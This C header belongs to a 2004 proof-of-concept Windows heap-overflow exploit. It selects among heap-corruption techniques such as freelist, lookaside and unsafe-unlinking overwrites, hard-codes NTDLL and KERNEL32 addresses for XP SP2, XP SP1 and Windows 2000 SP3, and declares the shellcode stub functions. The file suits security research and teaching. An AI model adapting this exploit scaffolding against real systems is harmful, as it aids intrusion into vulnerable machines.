// Proof-of-concept heap exploit code
// Written by Matt Conover in December 2004
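#ifndef SHELLCODE_H
#define SHELLCODE_H

// Target build selector. Only the address block below that matches this
// selector is active; see the "Depends on version" section.
#define USE_XPSP2

// Technique selector: which heap-corruption primitive the stub relies on.
// Only one of these is uncommented here; presumably the implementation file
// expects exactly one to be active -- confirm there.
//#define USE_FREELIST_LISTHEAD_OVERWRITE 1
//#define USE_LOOKASIDE_LISTHEAD_OVERWRITE 1
//#define USE_UNSAFE_UNLINKING_FREELIST_OVERWRITE
#define USE_CHUNK_ON_LOOKASIDE_OVERWRITE 1
//#define USE_LOOKASIDE_REMAP 1
//#define USE_CACHE_OVERWRITE 1

// Payload selector: C-written stub vs. the assembly stub, and how the stub
// ends (terminate thread, terminate process, or spin when neither is set).
//#define USE_C_SHELLCODE 1
//#define USE_THREAD_TERMINATE 1 // if this is not defined, the shellcode goes into a loop instead
#define USE_PROCESS_TERMINATE 1

// Win32 pseudo-handles for the calling process/thread (32-bit values, matching
// the 32-bit targets listed below).
#define GET_CURRENT_PROCESS() ((HANDLE)0xFFFFFFFF)
#define GET_CURRENT_THREAD() ((HANDLE)0xFFFFFFFE)

/////////////////////////////////////////////////////////////////
// Depends on version of NTDLL and KERNEL32
//
// These are absolute export addresses hard-coded per OS build, which is why
// the whole PoC is tied to one exact NTDLL/KERNEL32 pair: on any other build
// the same numbers presumably point into unrelated code. Selection is done by
// hand (comment/uncomment a block) rather than via USE_XPSP2 -- keep the
// active block in step with that selector.

// Windows XP SP2
#define RTL_ENTER_CRITICAL_SECTION 0x7C901005
#define RTL_LEAVE_CRITICAL_SECTION 0x7C9010ED
#define ZW_TERMINATE_THREAD 0x7C90E8A3
#define ZW_TERMINATE_PROCESS 0x7C90E88E
#define SLEEP 0x7C802442
//#define SEH 0x7C8833AC // NOTE on XPSP2: this must be overwritten with a pointer returned from RtlEncodePointer()

// Windows XP SP1
//#define RTL_ENTER_CRITICAL_SECTION 0x77f5b2a0 
//#define RTL_LEAVE_CRITICAL_SECTION 0x77f5b380
//#define ZW_TERMINATE_THREAD 0x77f5c458
//#define ZW_TERMINATE_PROCESS 0x77f5c448
//#define SLEEP 0x77e61bea
//#define SEH 0x77ee044c

// Windows 2000 SP3
//#define RTL_ENTER_CRITICAL_SECTION 0x77f8313c
//#define RTL_LEAVE_CRITICAL_SECTION 0x77f8316d
//#define ZW_TERMINATE_THREAD 0x77f852cd
//#define ZW_TERMINATE_PROCESS 0x77f896c3
//#define SLEEP 0x77ea9d54
//#define SEH 0x77ea1678

// Opcode of the x86 near JMP with a 32-bit relative displacement.
#define X86_JMP_4BYTES 0xe9
// Upper bound on stub size; presumably bounds the END_FUNCTION scan in
// GetStubLength() -- confirm in the implementation file.
#define MAX_STUB_SIZE 1024
// Three-byte marker emitted after a stub so its end can be located at run time.
#define END_SIGNATURE_PART1 0xab
#define END_SIGNATURE_PART2 0xcd
#define END_SIGNATURE_PART3 0xef

// Emits the end-of-stub marker (MSVC inline assembly). Place it as the last
// statement of a stub function.
#define END_FUNCTION \
	_asm _emit END_SIGNATURE_PART1 \
	_asm _emit END_SIGNATURE_PART2 \
	_asm _emit END_SIGNATURE_PART3

// Resolves the real code address of Function. Presumably follows an
// X86_JMP_4BYTES thunk when the build inserts one -- confirm in the .c file.
BYTE *GetFunctionAddress(BYTE *Function);

// Returns the byte length of Stub, presumably measured up to the
// END_FUNCTION marker and bounded by MAX_STUB_SIZE -- confirm in the .c file.
DWORD GetStubLength(BYTE *Stub);

// The two stub bodies; each is expected to end with END_FUNCTION.
// Declared with (void): an empty parameter list is an old-style declaration
// that disables argument checking.
void c_shellcode_stub(void);
void shellcode_stub(void);
 
#endif // SHELLCODE_H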
